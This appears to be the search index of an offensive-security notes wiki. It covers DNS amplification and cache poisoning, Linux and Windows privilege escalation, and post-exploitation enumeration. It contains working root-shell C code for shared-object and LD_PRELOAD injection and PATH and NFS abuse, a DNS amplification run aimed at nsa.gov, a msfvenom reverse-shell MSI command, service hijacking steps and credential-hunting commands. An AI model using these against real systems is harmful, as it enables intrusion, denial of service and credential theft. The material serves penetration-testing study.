raw.githubusercontent.com (raw.githubusercontent.com)|185.199.109.133|:443... connected.\nHTTP request sent, awaiting response... 200 OK\nLength: 15109 (15K) [text/plain]\nSaving to: ‘dnsdrdos.c’ dnsdrdos.c 100%[========================================================================================================================================>] 14.75K --.-KB/s in 0.001s 2021-09-21 13:01:11 (17.9 MB/s) - ‘dnsdrdos.c’ saved [15109/15109] ┌──(cr0mll@kali)-[~/MHN/DNS]-[]\n└─$ gcc -o dnsdrdos dnsdrdos.c -Wall -ansi Now, create a file containing the IP's of each DNS server you want to use in the attack (only one IP per line). Use the following syntax to run the attack: sudo ./dnsdrdos -f -s -d -l ┌──(cr0mll@kali)-[~/MHN/DNS]-[]\n└─$ sudo ./dnsdrdos -f dns_servers -s 192.168.129.2 -d nsa.gov -l 30\n----------------------------------------------- dnsdrdos - by noptrix - http://www.noptrix.net/ ----------------------------------------------- ┌──(cr0mll@kali)-[~/MHN/DNS]-[]\n└─$ The output may be empty, but the packets were sent. You can verify this with wireshark:","breadcrumbs":"Exploitation » DNS » DNS Traffic Amplification » Executing the attack","id":"156","title":"Executing the attack"},"157":{"body":"A flaw of all DNS name servers is that if they contain incorrect information, they may spread it to clients or other name servers. Each DNS name server (even individual clients) has a DNS cache. The system stores there information about any responses it gets for domains it requested. An attacker could inject false entries in this cache and as such, any computer which queries the poisoned name server will receive false results. This is known as DNS cache poisoning . The attack can be used to redirect users to a different website than the requested one. As such, it opens opportunities for phishing attacks by creating evil twins of login portals for well-known sites. A tool for performing such targeted attacks is deserter . Usage information is available on its GitHub page.","breadcrumbs":"Exploitation » DNS » DNS Cache Poisoning » Introduction","id":"157","title":"Introduction"},"158":{"body":"","breadcrumbs":"Post Exploitation » Post Exploitation","id":"158","title":"Post Exploitation"},"159":{"body":"","breadcrumbs":"Post Exploitation » Privilege Escalation » Introduction","id":"159","title":"Introduction"},"16":{"body":"Reveals the presence of known vulnerabilities. It checks whether a system is exploitable through a set of weaknesses. Such a scanner consists of a catalog and a scanning engine. The catalog contains information about known vulnerabilities and exploits for them that work on a multitude of servers. The scanning engine is responsible for the logic behind the exploitation and analysis of the results.","breadcrumbs":"Reconnaissance » Enumeration » Vulnerability Scanning","id":"16","title":"Vulnerability Scanning"},"160":{"body":"The first thing you need to do after gaining a foothold on a machine is to look for reused credentials. You should try every password you have gathered on all users, you never know when you might find an easy escalation to root. Next, you should hunt down sensitive files and look for stored credentials in configuration and source files of different applications. Naturally, you should also enumerate any local databases you find. Additionally, SSH keys are something to be on the lookout for. You should also go through the bash history and look for any passwords which were passed as command-line arguments. You should then move on to looking for exploits. Kernel exploits are really low-hanging fruit, so you should always check the kernel version. Subsequently, proceed by enumerating sudo and the different ways to exploit it, for example via Shell Escape Sequences or LD_PRELOAD . Following, you should proceed by tracking down any misconfigurations such as excessive capabilities or SUID Binaries . You should check if you have write access to any sensitive files such as /etc/passwd or /etc/shadow, as well as any cron jobs or cron job dependencies. Ultimately, you should move on to enumerating running software and services which are executed as root and try to find vulnerabilities in them which may allow for privilege escalation. This can all be summed up into the following: Credentials Reused Credentials Credentials in Configuration or Source Files Credentials from Databases Credentials in Sensitive Files Credentials from Bash History SSH Keys Exploitation Kernel Exploits Sudo Misconfigurations Excessive Capabilities SUID/SGID Binaries Write Access to Sensitive Files Writable Cron Jobs and Cron Job Dependencies Installed Software Vulnerabilities in Software and Services Running as Root","breadcrumbs":"Post Exploitation » Privilege Escalation » Linux » Methodology","id":"160","title":"Methodology"},"161":{"body":"The Set Owner User ID (SUID) and Set Group ID (SGID) are special permissions which can be attributed to Linux files and folders. Any files which are owned by root and have SUID set will be executed with elevated privileges. Our goal is to hunt down those files and abuse them in order to escalate our privileges. This can be easily done with the following command: find / -perm -u=s -type f -user root 2>/dev/null","breadcrumbs":"Post Exploitation » Privilege Escalation » Linux » Abusing SUID & SGID Binaries » Introduction","id":"161","title":"Introduction"},"162":{"body":"You should diligently inspect the list of files returned. Some standard Linux binaries may allow for privilege escalation if they have the SUID bit set for one reason or another. It is useful to go through these binaries and check them on GTFOBins . In the above example, we find that /bin/systemctl has the SUID bit set and that it also has an entry in GTFOBins : By following the instructions, although with slight modifications, we can run commands with elevated privileges:","breadcrumbs":"Post Exploitation » Privilege Escalation » Linux » Abusing SUID & SGID Binaries » Exploiting Misconfigured Common Binaries","id":"162","title":"Exploiting Misconfigured Common Binaries"},"163":{"body":"Some binaries may be vulnerable to Shared Object (SO) Injection. This typically stems from misconfigurations where the binary looks for a specific library in a specific directory, but can't actually find it. If we have write access to this directory, we can hijack the search for the library by compiling our own malicious library in the place where the original one was supposed to be. This is quite similar to escalating via LD_PRELOAD , but it is a bit more difficult to find and exploit. You will first need to identify an SUID binary which has misconfigured shared libraries. A lot of the times the binary will refuse to run, saying that it is missing a particular library, however, this is not always the case: It is always good practice to run the programme with strace, which will print any attempts of the binary to access libraries: strace 2>&1 | grep -iE \"open|access\" What stands out in particular is the /home/user/.config/libcalc.so library, since /home/user/.config/ may be a writable directory. It turns out that the directory doesn't even exist, however, we can write to /home/user/ which means that we can create it. What now remains is to compile a malicious library into libcalc.so. #include \n#include static void inject() __attribute__((constructor)); void inject()\n{ setuid(0); setgid(0); system(\"/bin/bash -i\");\n} For older versions of GCC, you may need to use the _init() function syntax: #include \n#include void _init()\n{ setuid(0); setgid(0); system(\"/bin/bash -i\");\n} Compile the malicious library: gcc -shared -fPIC -o libcalc.so libcalc.c # add -nostartfiles if using _init()","breadcrumbs":"Post Exploitation » Privilege Escalation » Linux » Abusing SUID & SGID Binaries » Privilege Escalation via Shared Object Injection","id":"163","title":"Privilege Escalation via Shared Object Injection"},"164":{"body":"Path Hijacking refers to the deliberate manipulation of environmental variables, most commonly \\$PATH, such that the invocations of programmes in a binary actually refer to malicious binaries and not the intended ones. This vector requires more sophisticated digging into the internals of an SUID binary, specifically tracking down the different invocations the binary performs. This can commonly be achieved by running strings on the binary, but you will probably have to resort to more serious reverse engineering, as well. Specifically, you want to be on the lookout for shell commands which get executed by the SUID binary.","breadcrumbs":"Post Exploitation » Privilege Escalation » Linux » Abusing SUID & SGID Binaries » Privilege Escalation via Path Hijacking","id":"164","title":"Privilege Escalation via Path Hijacking"},"165":{"body":"Relative paths are comparably easy to hijack - they require little other than editing the \\$PATH variable. Once you have identified a shell command within an SUID binary which invokes another programme via a relative path, you can just prepend to the \\$PATH a directory which will contain an executable with the same name as the one originally invoked. Let's compile our own malicious binary. #include \n#include int main()\n{ setuid(0); setgid(0); system(\"/bin/bash -i\"); return 0;\n} gcc -o /tmp/service /tmp/service.c Afterwards, we need to prepend /tmp to the \\$PATH variable: export PATH=/tmp:\\$PATH And finally, run the original SUID binary:","breadcrumbs":"Post Exploitation » Privilege Escalation » Linux » Abusing SUID & SGID Binaries » Hijacking Relative Paths","id":"165","title":"Hijacking Relative Paths"},"166":{"body":"Absolute paths require a bit more work to be hijacked. Luckily, bash turns out to be very sophisticated and allows for the creation of functions which have the forward slash (/) character in their name. This means that we can create a malicious bash function with the same name as the absolute path we want to hijack and then our function will be invoked in lieu of the original programme. First, create the bash function: function () { cp /bin/bash /tmp/bash && chmod +s /tmp/bash && /tmp/bash -p; } Next, export the function: export -f Finally, run the original SUID binary:","breadcrumbs":"Post Exploitation » Privilege Escalation » Linux » Abusing SUID & SGID Binaries » Hijacking Absolute Paths","id":"166","title":"Hijacking Absolute Paths"},"167":{"body":"The kernel is the layer which sits between applications and the hardware. It runs with root privileges, so if it gets exploited, privileges can be escalated. Finding kernel vulnerabilities and writing exploits for them is no trifling task, however, once such a vulnerability is made public and exploit code for it is developed, it easily becomes a low-hanging fruit for escalating privileges. A very useful list of kernel exploits found to date is located here . Finding already existing exploits is really easy - just search for the Linux kernel version!","breadcrumbs":"Post Exploitation » Privilege Escalation » Linux » Kernel Exploits » Introduction","id":"167","title":"Introduction"},"168":{"body":"As an example, we are going to exploit dirtyc0w. This was a very ubiquitous exploit and can still be found on numerous outdated machines. The exploit itself has many versions but for demonstration purposes we are going to use the one at https://www.exploit-db.com/exploits/40839 . We need to first verify that our kernel version is in the vulnerable range. Inside the exploit we see compilation instructions, which is typical of kernel exploits as they are usually written in C: By compiling and running the exploit (it may actually take some time to execute), we have elevated our privileges!","breadcrumbs":"Post Exploitation » Privilege Escalation » Linux » Kernel Exploits » Exploiting the Kernel","id":"168","title":"Exploiting the Kernel"},"169":{"body":"It is common to see a low-privileged user to be configured to be able to run some commands via sudo without a password. Luckily, many existing programmes for Linux have advanced capabilities which allow them to do many things such as spawning a shell when run with sudo. If such a programme is configured in the aforementioned way, then there is a shell escape sequence which is a (usually) simple command/argument passed to the programme when run, so that it spawns a shell with elevated privileges when run with sudo. Naturally, these shell escape sequences are programme-specific and it would be inane to try and remember the sequence for every binary. This is where GTFOBins comes in. This is a database of commands (including shell escape sequences) for common Linux binaries which can be used for escalating privileges. We saw in the above list provided by sudo -l that we are allowed to run find as root via sudo. Let's check if there is a shell escape sequence for it. There is! We can copy and paste it, then run it with sudo, and we should at last have a root shell: Another example can be given with the awk binary, which we also saw in the list provided by sudo -l.","breadcrumbs":"Post Exploitation » Privilege Escalation » Linux » Sudo Shell Escape Sequences » Introduction","id":"169","title":"Introduction"},"17":{"body":"All services which need to somehow interface with the network a host is connected to run on ports and port scanning allows us to enumerate them in order to gather information such as what service is running, which version of the service is running, OS information, etc. Warning Port scanning is very heavy on network bandwidth and generates a lot of traffic which can cause the target to slow down or crash altogether. During a penetration test, you should always inform the client when you are about to perform a port scan. Danger Port scanning without prior written permission from the target may be considered illegal in some jurisdictions. The de-facto standard port scanner is nmap , although alternatives such as masscan and RustScan do exist. Info A lot of nmap's techniques require elevated privileges, so it is advisable to always run the tool with sudo.","breadcrumbs":"Reconnaissance » Enumeration » Port Scanning » Introduction","id":"17","title":"Introduction"},"170":{"body":"The compromised machine may be configured to allow certain directories to be mounted by other machines. You can enumerate such directories by running the following command on the victim machine: cat /etc/exports You can additionally verify this from your attacker machine by running: showmount -e If there is a mountable directory which is configured as no_root_squash, as is the case here, then it can be used for privilege escalation. We begin by mounting the target directory from the victim to a directory on our machine: sudo mount -o rw, vers=3 :/tmp /tmp/root_squash Now, if no_root_sqaush is configured for the mountable directory, then the root user on the attacker machine will get mirrored on the victim machine. In essence, any command run as root on the attacker machine, will also be executed as root on the victim! This can allow us to create a malicious binary in the mounted directory and set its SUID bit from the attacker machine. This action will be mirrored by the victim and we will essentially have an SUID binary on the target which is all under our control. Let's write a simple malicious C executable: #include \n#include int main()\n{ setuid(0); // Set user ID to root setgid(0); // Set group ID to root system(\"/bin/bash -i\"); // Execute bash now with elevated privileges return 0;\n} It doesn't matter if you create it on the target or the attacker machine, but you must compile it on the target machine in order to avoid library version mismatches: gcc -o nfs_exploit nfs_exploit.c Next, you want to change the ownership of the compiled binary to root on the attacker machine . Afterwards, you want to set the SUID bit on the binary, once again, from the attacker machine : sudo chown root:root nfs_exploit\nsudo chmod +s nfs_exploit Finally, execute the malicious binary on the target :","breadcrumbs":"Post Exploitation » Privilege Escalation » Linux » NFS Root Squashing » Introduction","id":"170","title":"Introduction"},"171":{"body":"Linux capabilities provide a way for splitting permissions into small units. A binary with particular capabilities can perform certain tasks with elevated privileges. If capabilities are not properly set, or if they are excessive, this may lead to privilege escalation. Binaries with capabilities may be found using the following command: getcap / -r 2>/dev/null A list of all possible capabilities can be found here . In the above example, we can see that the python interpreter can arbitrarily set the user ID of the process. This means that we can change our user ID to 0 when running python, thus escalating our privileges:","breadcrumbs":"Post Exploitation » Privilege Escalation » Linux » Abusing Linux Capabilities » Introduction","id":"171","title":"Introduction"},"172":{"body":"The LD_PRELOAD environment variable can be used to tell the dynamic linker to load specific libraries before any others. By default, programmes run with sudo will be executed in a clean, minimal environment which is specified by env_reset when running sudo -l. However, env_keep may be used to inherit some environment variables from the parent process. If LD_PRELOAD is specified together with env_keep, then we can compile our own malicious dynamic library and set LD_PRELOAD to it. Therefore, when we execute a binary with sudo, our library will be loaded before any other library and its initialisation function will be invoked with root permissions.","breadcrumbs":"Post Exploitation » Privilege Escalation » Linux » Sudo Escalation via LD_PRELOAD » Introduction","id":"172","title":"Introduction"},"173":{"body":"Writing the library is a fairly simple task. All we need to do is write an _init function in a C file. This procedure will contain the code we want to be executed when the library is loaded. #include \n#include \n#include void _init()\n{ unsetenv(\"LD_PRELOAD\"); // Unset LD_PRELOAD to avoid an infinite loop setgid(0); // Set root permissions setuid(0); // Set root permissions system(\"/bin/bash\");\n} We begin by unsetting the LD_PRELOAD variable from the environment. This is to preclude an infinite loop when /bin/bash is invoked. If our library didn't unset LD_PRELOAD, then when /bin/bash is called, our library will again be loaded first and then proceed onto launching /bin/bash yet again, which will again load our library and so on. The next two lines set the user and group IDs to those of root which ensures that the next commands are run with root privileges. Finally, system is called in order to spawn a bash shell. We now need to compile this file as a shared library: gcc -fPIC -shared -o exploit.so exploit.c -nostartfiles At last, we can invoke any binary with sudo and specify the path to our library as LD_PRELOAD. Note that the path to the library must be specified as an absolute path.","breadcrumbs":"Post Exploitation » Privilege Escalation » Linux » Sudo Escalation via LD_PRELOAD » Writing the Malicious Library","id":"173","title":"Writing the Malicious Library"},"174":{"body":"Once you have gained access to a system, it is paramount to look for other credentials which may be located on the system. These may be hidden in the Windows Registry, within log or configuration files, and more. Moreover, you should check to see if any credentials you have previously found work with anything else. You should also check if you have access to the Windows SYSTEM or SAM files or any of their backups, since those will contain the hashes for users on the system. If so, you might be able to perform a pass-the-hash attack or simply crack them. If the compromised system is a Windows Server, you should look for any stored credentials which can be used with RunAs. You should check the Windows build and version, see if there are any kernel exploits available. You should then move onto enumerating misconfigurations in services and other Windows-specific vectors. If none of these bear any fruit, you should look at the programmes installed on the system, enumerate them for misconfigurations, explore their versions and any exploits which may be available. If none are found, you might consider reverse engineering and binary exploitation as a last resort. Finally, if you have gained access as a local administrator, you should proceeding to looking for ways to bypass UAC . In essence: Credentials Reused Credentials Credentials in Configuration or Log files Credentials in the Windows Registry Credentials from Windows SAM and SYSTEM files Pass-the-hash attacks Stored Credentials (Windows Servers) Kernel Exploits Misconfigurations Services AutoRuns Startup Applications Scheduled Tasks AlwaysInstallElevated Group Policy Bypassing UAC","breadcrumbs":"Post Exploitation » Privilege Escalation » Windows » Methodology","id":"174","title":"Methodology"},"175":{"body":"Windows Services allow for the creation of continuously running executable applications. These applications have the ability to be automatically started upon booting, they may be paused and restarted, and they lack a user interface. In order for a service to function properly, it needs to be associated with a system or user account. There are a few common built-in system accounts that are used to operate services such as LocalService, NetworkService, and LocalSystem. The following table describes the default secure access rights for accounts on a Windows system: Account Permissions Local Authenticated Users (including LocalService and Network Service) READ_CONTROL SERVICE_ENUMERATE DEPENDENTS SERVICE_INTERROGATE SERVICE_QUERY_CONFIG SERVICE_QUERY_STATUS SERVICE_USER_DEFINED_CONTROL Remote Authenticated Users Same as those for Local Authenitcated Users. LocalSystem READ_CONTROL SERVICE_ENUMERATE DEPENDENTS SERVICE_INTERROGATE SERVICE_PAUSE_CONTINUE SERVICE_QUERY_CONFIG SERVICE_QUERY_STATUS SERVICE_START SERVICE_STOP SERVICE_USER_DEFINED_CONTROL Administrators DELETE READ_CONTROL SERVICE_ALL_ACCESS WRITE_DAC WRITE_OWNER Moreover, a registry entry exists for each service in HKLM\\SYSTEM\\CurrentControlSet\\Services.","breadcrumbs":"Post Exploitation » Privilege Escalation » Windows » Misconfigured Services » Introduction","id":"175","title":"Introduction"},"176":{"body":"In general, manual enumeration of Windows services is a rather cumbersome process, so I suggest that you use a tool for automation such as WinPEAS . winpeas.exe servicesinfo The permissions a user has on a specific service can be inspected via the AccessChk Windows Utility. acceschk.exe /accepteula -uwcqv ","breadcrumbs":"Post Exploitation » Privilege Escalation » Windows » Misconfigured Services » Enumeration","id":"176","title":"Enumeration"},"177":{"body":"This is a vulnerability which can be used to force a misconfigured service to execute an arbitrary programme in lieu of its intended one, as long as the path to that executable contains spaces. On its own, this does not allow for privilege escalation, but it becomes a really powerful tool when the misconfigured service is set to run with system privileges. Let's take a look at the following path: C:\\Program Files\\Vulnerable Service\\service.exe If this path was specified to the service in quotation marks, \"C:\\Program Files\\Vulnerable Service\\service.exe\", then Windows will treat it correctly, executing the service.exe file in the C:\\Program Files\\Vulnerable Service directory. However, Windows is not the sharpest tool in the box and if the path is provided without quotation marks, then it will see ambiguity in what it is supposed to execute. The path will be split at each space character - the first segment will be treated as the executable's name and the rest will be seen as command-line arguments to be passed to it. So at first, Windows will try to execute the following: C:\\Program.exe Files\\Vulnerable Service\\service.exe Once Windows determines that the C:\\Program.exe file does not exist, it will look for the next space character, treat the characters up to it as the new path and try to execute it again: C:\\Program Files\\Vulnerable.exe Service\\service.exe Now, this is process is recursive until a file is successfully executed or the end of the path has been reached. If we are able to create a malicious executable in any of the possible paths that Windows will traverse, then we can hijack the service before the intended file is found. Once you have identified a vulnerable service, you can query to confirm that the path is indeed unquoted. Let's check our access to the possible directories that will be probed by Windows: accesschk.exe /accepteula -uwdq While we cannot write within the C:\\ or C:\\Program Files directories (meaning that we cannot create C:\\Program.exe or C:\\Program Files\\Unquoted.exe), we do have write access to C:\\Program Files\\Unquoted Path Service\\. What this entails is our ability to create a Common.exe binary inside this directory and, since the initial path was unquoted, the path C:\\Program Files\\Unquoted Path Service\\Common.exe will be probed before C:\\Program Files\\Unquoted Path Service\\Common Files\\unquotedpathservice.exe and once Windows finds our malicious executable there, it will be executed with the service's permissions. If we couldn't restart the service, then we could have simply waited for something else to execute it.","breadcrumbs":"Post Exploitation » Privilege Escalation » Windows » Misconfigured Services » Unquoted Service Paths » Unquoted Service Paths","id":"177","title":"Unquoted Service Paths"},"178":{"body":"As previously mentioned, each service is associated with a registry entry in the Windows Registry which is located at HKLM\\SYSTEM\\CurrentControlSet\\Services\\. This entry is essentially the configuration of the service and if it is writable, then it can be abused by an adversary to overwrite the path to the binary application of the service with a malicious one. Querying regsvc reveals that it is running with system privileges and its registry entry is writable by all logged-on users (NT AUTHORITY\\INTERACTIVE). All we need to do now is overwrite the ImagePath registry key in the service's entry to point to our malicious executable: reg add HKLM\\SYSTEM\\CurrentControlSet\\services\\ /v ImagePath /t REG_EXPAND_SZ /d /f Restart the service and catch the shell: net start regsvc","breadcrumbs":"Post Exploitation » Privilege Escalation » Windows » Misconfigured Services » Weak Registry Permissions » Weak Registry Permissions","id":"178","title":"Weak Registry Permissions"},"179":{"body":"This is a technique which leverages misconfigurations in the service permissions for a specific user. If permissions for a specific user differ from the ones described in the table here , then they may manifest as a possible vulnerability. To identify such services, it is useful to use WinPEAS. It appears that user has write access to the service daclsvc and can also start the service. We can query the service to see what user account is actually executing it: sc qc It appears that the service is running as LocalSystem which is an account with more privileges than our user account. If we can write to the service, then we can alter its configuration and change the path to the executable which is supposed to be run: sc config binpath=\"\\\"\\\"\" All we now need to do is setup a listener and run the service: net start And we get a system shell back:","breadcrumbs":"Post Exploitation » Privilege Escalation » Windows » Misconfigured Services » Insecure Service Permissions » Insecure Service Permissions","id":"179","title":"Insecure Service Permissions"},"18":{"body":"There are two types of ports depending on the transport-layer protocol that they support. Both TCP and UDP ports range from 0 to 65535 but they are completely separate. For example, DNS uses UDP port 53 for queries but it uses TCP port 53 for zone transfers. To scan UDP ports, nmap requires elevated privileges and the -sU flag. nmap -sU Note Due to the nature of the protocol, UDP scanning takes a lot longer than TCP does.","breadcrumbs":"Reconnaissance » Enumeration » Port Scanning » TCP vs UDP","id":"18","title":"TCP vs UDP"},"180":{"body":"The binary application executed by a service is considered insecure when an adversary has write access to it when they shouldn't. This means that an attacker can simply replace the file with a malicious executable. If the service is configured to run with system privileges, then those privileges will be inherited by the attacker's executable! All we need to do is simply replace the legitimate executable with a malicious one and then start the service.","breadcrumbs":"Post Exploitation » Privilege Escalation » Windows » Misconfigured Services » Insecure Service Executable Permissions » Introduction","id":"180","title":"Introduction"},"181":{"body":"AutoRun application are programmes which have been set up to automatically execute when a user logs in for the first time after booting the system. This is typically done so that the application can look for updates and update itself if necessary. For example, Steam, Spotify, and Discord, all set this up upon installation. On its own, this does not pose a security risk. Where the real vulnerabilities lies is within AutoRuns which are writable by anyone. AutoRuns can be enumerated by querying the registry: reg query HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run Now all we need to do is generate the malicious executable and replace the AutoRun programme with it. Note that in order for the exploit to work, an administrator would need to log in. Now, as soon as the administrator logs in, we will get an elevated shell.","breadcrumbs":"Post Exploitation » Privilege Escalation » Windows » AutoRun Programmes » Introduction","id":"181","title":"Introduction"},"182":{"body":"Windows has a group policy which, when enabled, allows a user to install a Microsoft Windows Installer Package (.msi file) with elevated privileges. This poses a security risk because an adversary can simply generate a malicious .msi file and execute it with admin privileges. In order to check for this vulnerability, one need only query the following registry keys: reg query HKCU\\SOFTWARE\\Policies\\Microsoft\\Windows\\Installer /v AlwaysInstallElevated\nreg query HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows\\Installer /v AlwaysInstallElevated The AlwaysInstallElevated policy appears enabled, so we can generate a malicious .msi executable. One way to do this is through Metasploit: msfvenom -p windows/x64/shell_reverse_tcp LHOST= LPORT= -f msi -o reverse.msi Next, transfer the executable to the target machine and execute it with msiexec: msiexec /quiet /qn /i ","breadcrumbs":"Post Exploitation » Privilege Escalation » Windows » AlwaysInstallElevated Group Policy » Introduction","id":"182","title":"Introduction"},"183":{"body":"Kernel exploits are one of the most trivial privilege escalation paths available. One of the first things you should do when seeking for a privilege escalation vector is to look at the kernel version as well as any installed patches and determine if it is vulnerable to a known kernel exploit. Plenty of exploits can be found just by searching up the kernel version, but a cheat sheet which I like can be found here . Naturally, the exploitation of a kernel exploit is highly specific on a case-by-case basis. Once you have identified that the system is vulnerable to a known kernel exploit, you will need to find the exploit code.","breadcrumbs":"Post Exploitation » Privilege Escalation » Windows » Kernel Exploits » Introduction","id":"183","title":"Introduction"},"184":{"body":"Windows Scheduled Tasks allow for the periodic execution of scripts. These can be manually enumerated via the following command: schtasks /query /fo LIST /v A scheduled task is of interest when it is executed with elevated privileges but we have write access to the script it executes. This script is fairly simple, so we can just append a line to it which executes a malicious executable. When the time for the scheduled task comes, we will catch an elevated shell.","breadcrumbs":"Post Exploitation » Privilege Escalation » Windows » Scheduled Tasks » Introduction","id":"184","title":"Introduction"},"185":{"body":"User Account Control (UAC) is a security measure introduced in Windows Vista which aims to prevent unauthorised changes to the operating system. It ensures that any such changes require the assent of the administrator or a user who is part of the local administrators group. Administrative privileges in Windows are a bit different from those in Linux. Even if an adversary manages to execute some code from an administrator account, this code will not run with elevated privileges, unless it was \"run as Administrator\"-ed. When an unprivileged user attempts to run a programme as administrator, they will be prompted by UAC to enter the administrator's password. However, if the user is privileged (they are an administrator), they will still be prompted with the same UAC prompt, but it will ask them for consent in lieu of a password. Essentially, an administrative user will need to click \"Yes\" instead of typing their password. What is described so far is the default behaviour. UAC, however, has different protection levels which can be configured. Now there are 3 (two of the options are the same but with different aesthetics) options. The first option, and the most strict, is Always Notify. If UAC is set to this, then any programme which tries to run with elevated privileges will beget a UAC prompt - including Windows built-in ones. Next is the default setting - Notify me when application try to make changes to my computer. Under this configuration, regular applications will still cause a UAC prompt to show up whenever run as administrator, however, Windows built-in programmes can be run with elevated privileges without such a prompt. Following is another option which is the exact same as this one, but the UAC prompt will not dim the screen. This is useful for computers for which dimming the screen is not exactly a trifling task. Finally, the Never Notify means that a UAC prompt will never be spawned no matter who is trying to run the application with elevated privileges. UAC can be bypassed if an adversary already has access to a user account which is part of the local administrators group and UAC is configured to the default setting.","breadcrumbs":"Post Exploitation » Privilege Escalation » Windows » Bypassing UAC » Introduction","id":"185","title":"Introduction"},"186":{"body":"There are many tools for bypassing UAC and which one is to be used depends on the Windows build and version. One such tool which has lots of methods for bypassing UAC is UACMe . You will need to build it from source using Visual Studio, meaning that you will need a Windows machine in order to compile it.","breadcrumbs":"Post Exploitation » Privilege Escalation » Windows » Bypassing UAC » Bypassing UAC","id":"186","title":"Bypassing UAC"},"187":{"body":"Windows Startup applications are very similar to AutoRun Programmes , however, they are executed every time a user logs in. If we can write to the Startups directory, then we can place a malicious executable there which will be executed upon the next login. If the next user to log in is an administrator, then we will gain elevated privileges. To check for write access to the Startups directory, we can use accesschk: C:\\PrivEsc\\accesschk.exe /accepteula -d \"C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\StartUp\" All we need to do is place a malicious executable in the directory and wait for an admin to log in.","breadcrumbs":"Post Exploitation » Privilege Escalation » Windows » Startup Applications » Introduction","id":"187","title":"Introduction"},"188":{"body":"Windows Servers have capabilities to store credentials using a built-in utility called cmdkey . On its own, cmdkey is rather useless to an adversary - you can only really use it to list what credentials are stored but not actually reveal them. cmdkey /list The real deal is another built-in utility called Runas . It allows one user to execute a binary with the permissions of another and, what is essential here, this can be achieved with only stored credentials. One doesn't even need to know what the credentials are - so long as a user has their credentials stored, then they can be used to execute programmes as that user. runas /savedcred /user: ","breadcrumbs":"Post Exploitation » Privilege Escalation » Windows » Stored Credentials » Introduction","id":"188","title":"Introduction"},"189":{"body":"Windows Access Tokens are objects which describe the security context in which a thread or process is run. The information within an access token identifies the user and their privileges of said process or thread. Upon each successful user log-on, an access token for the user is generated and every process executed by this user will contain a copy of this token called the primary token . This token is used by the system to inspect the privileges of the process when the process tries to interact with something which may require certain privileges. However, threads of the process are allowed to use a second token, called an impersonation token , to interact with objects as if they had a different security context and different privileges. This is only allowed when the process has the SeImpersonatePrivilege. As with UAC bypassing , exploiting token impersonation is highly dependent on the Windows build and version. However, the most infamous exploits are the Potato exploits .","breadcrumbs":"Post Exploitation » Privilege Escalation » Windows » Token Impersonation » Introduction","id":"189","title":"Introduction"},"19":{"body":"When scanning, nmap will determine that a port is in one of the following states: open - an application is actively listening for TCP connections, UDP datagrams or SCTP associations on this port closed - the port is accessible (it receives and responds to Nmap probe packets), but there is no application listening on it filtered - Nmap cannot determine whether the port is open because packet filtering prevents its probes from reaching the port. Usually, the filter sends no response, so Nmap needs to resend the probe a few times in order to be sure that it wasn't dropped due to traffic congestion. This slows the scan drastically unfiltered - the port is accessible, but Nmap is unable to determine whether it is open or closed. Only the ACK scan, used for mapping firewall rulesets, may put ports in this state open|filtered - Nmap is unable to determine whether the port is open or filtered. This occurs for scan types in which open ports give no response closed|filtered - Nmap is unable to determine whether the port is closed or filtered. It is only used for the IP ID idle scan. By default, nmap scans only the 1000 most common TCP ports. One can scan specific ports by listing them separated by commas directly after the -p flag. nmap -pport1,port2,... If no ports are specified after the -p flag, nmap will scan all ports (either UDP or TCP depending on the type of scan). nmap -p ","breadcrumbs":"Reconnaissance » Enumeration » Port Scanning » Port States","id":"19","title":"Port States"},"190":{"body":"","breadcrumbs":"Post Exploitation » Enumeration","id":"190","title":"Post Exploitation"},"191":{"body":"There are plenty of tools which can be used for automating post-exploitation enumeration on Linux machines.","breadcrumbs":"Post Exploitation » Enumeration » Linux » Introduction","id":"191","title":"Introduction"},"192":{"body":"LinPEAS is an amazing tool for automation enumeration. It is written in Bash which means that it requires no additional dependencies and can be freely run. In order to acquire the latest version of LinPEAS, run the following command: wget https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh By default, running LinPEAS will perform many checks on the system and spit out a deluge of information. However, the tool can also be used to only perform specific tasks using the -o argument. Enumerate system information: ./linpeas.sh -o system_information Enumerate containers on the machine: ./linpeas.sh -o container Enumerate cloud platforms: ./linpeas.sh -o cloud Enumerate available software: ./linpeas.sh -o software_information Enumerate processes, cronjobs, services, and sockets: ./linpeas.sh -o procs_crons_timers_srvcs_sockets Enumerate network information: ./linpeas.sh -o network_information Enumerate user information: ./linpeas.sh -o users_information Enumerate interesting files: ./linpeas.sh -o interesting_files","breadcrumbs":"Post Exploitation » Enumeration » Linux » Linux Enumeration with LinPEAS","id":"192","title":"Linux Enumeration with LinPEAS"},"193":{"body":"Find all files in a directory which contain \"pass\" or \"password\", ignoring case: grep --color=auto -rnw '' -ie \"password\\|pass\" --color=always 2>/dev/null Find all files in a directory which contain \"pass\" or \"password\" in their name, ignoring case: find / -name \"*pass*\" 2>/dev/null","breadcrumbs":"Post Exploitation » Enumeration » Linux » Hunting Down Sensitive Files » Finding Files Containing Passwords","id":"193","title":"Finding Files Containing Passwords"},"194":{"body":"find / -name id_rsa 2>/dev/null","breadcrumbs":"Post Exploitation » Enumeration » Linux » Hunting Down Sensitive Files » Finding SSH Keys","id":"194","title":"Finding SSH Keys"},"195":{"body":"System enumeration is a crucial, typically first, step in the enumeration phase of post-exploitation.","breadcrumbs":"Post Exploitation » Enumeration » Linux » System Enumeration » Introduction","id":"195","title":"Introduction"},"196":{"body":"cat /etc/issue","breadcrumbs":"Post Exploitation » Enumeration » Linux » System Enumeration » Enumerating the Distribution Version","id":"196","title":"Enumerating the Distribution Version"},"197":{"body":"uname -a cat /proc/version","breadcrumbs":"Post Exploitation » Enumeration » Linux » System Enumeration » Enumerating Linux Kernel Version Information","id":"197","title":"Enumerating Linux Kernel Version Information"},"198":{"body":"lscpu","breadcrumbs":"Post Exploitation » Enumeration » Linux » System Enumeration » Enumerating CPU Architecture","id":"198","title":"Enumerating CPU Architecture"},"199":{"body":"ps aux","breadcrumbs":"Post Exploitation » Enumeration » Linux » System Enumeration » Enumerating Running Services","id":"199","title":"Enumerating Running Services"},"2":{"body":"You should only make changes inside the eight category folders under the Notes/ directory. Minor edits to already existing content outside of the aforementioned allowed directories are permitted as long as they do not bring any semantic change - for example fixing typos.","breadcrumbs":"Cyberclopaedia » Contributing » In-Scope","id":"2","title":"In-Scope"},"20":{"body":"This is the type of scan which nmap defaults to when run with elevated privileges and is also also referred to as a \"stealth scan\". Nmap sends a SYN packet to the target, initiating a TCP connection. The target responds with SYN ACK, telling Nmap 